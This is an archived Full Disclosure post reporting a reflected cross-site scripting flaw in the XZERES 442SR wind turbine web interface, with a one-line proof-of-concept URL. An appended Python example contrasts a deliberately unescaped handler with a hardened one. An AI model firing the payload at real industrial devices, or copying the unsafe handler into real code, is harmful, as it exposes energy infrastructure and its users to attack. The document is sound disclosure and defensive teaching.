Full Disclosure mailing list archives
XZERES 442SR Wind Turbine XSS
From: Karn Ganeshen <karnganeshen () gmail com>
Date: Thu, 24 Dec 2015 18:05:36 +0000
XZERES 442SR Wind Turbine Cross-site Scripting Vulnerability

*AFFECTED PRODUCTS*

XZERES is a US-based energy company that maintains offices in several countries around the world, including the UK, Italy, Japan, Vietnam, Philippines, and Myanmar.

The affected product, 442SR Wind Turbine, has a web-based interface system. According to XZERES, the 442SR is deployed across the Energy sector. XZERES estimates that this product is used worldwide.

*Reference*

https://ics-cert.us-cert.gov/advisories/ICSA-15-342-01

*Vulnerable parameter*

id

*PoC*

http://<IP>/details?object=Inverter&id=2<script>alert(xss-id-parameter") </script>

--
Best Regards,
Karn Ganeshen

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
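
Added example, not part of the original post and not XZERES code: the reflected `id` value from the PoC above run through an unescaped handler and through a hardened one that validates the parameter and HTML-encodes on output. The handler names, the `<h1>` template, the allow-list, the digit limit and the 192.0.2.10 host are assumptions made for illustration.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: only "Inverter" is known from the advisory's PoC URL.
ALLOWED_OBJECTS = {"Inverter"}
# Assumption: a device object id is a short decimal number.
ID_PATTERN = re.compile(r"[0-9]{1,6}")

# PoC query string from the advisory, with a constructed documentation-range host.
POC_URL = ('http://192.0.2.10/details?object=Inverter'
           '&id=2<script>alert(xss-id-parameter") </script>')
BENIGN_URL = "http://192.0.2.10/details?object=Inverter&id=2"


def _params(url):
    """Extract the first 'object' and 'id' query values from a URL."""
    query = parse_qs(urlsplit(url).query)
    return query.get("object", [""])[0], query.get("id", [""])[0]


def render_details_unsafe(url):
    """Vulnerable pattern: request values are copied into HTML as-is."""
    obj, ident = _params(url)
    return f"<h1>{obj} {ident}</h1>"


def render_details_safe(url):
    """Hardened pattern: allow-list validation, then output encoding.

    Returns (status, body). Validation rejects anything that is not a
    known object name with a numeric id; html.escape() is still applied
    so the page stays safe if the validation rules are later relaxed.
    """
    obj, ident = _params(url)
    if obj not in ALLOWED_OBJECTS or not ID_PATTERN.fullmatch(ident):
        return 400, "<h1>Bad request</h1>"
    return 200, f"<h1>{html.escape(obj)} {html.escape(ident)}</h1>"


if __name__ == "__main__":
    print(render_details_unsafe(POC_URL))  # markup from the request survives
    print(render_details_safe(POC_URL))    # rejected with 400
    print(render_details_safe(BENIGN_URL)) # normal page
```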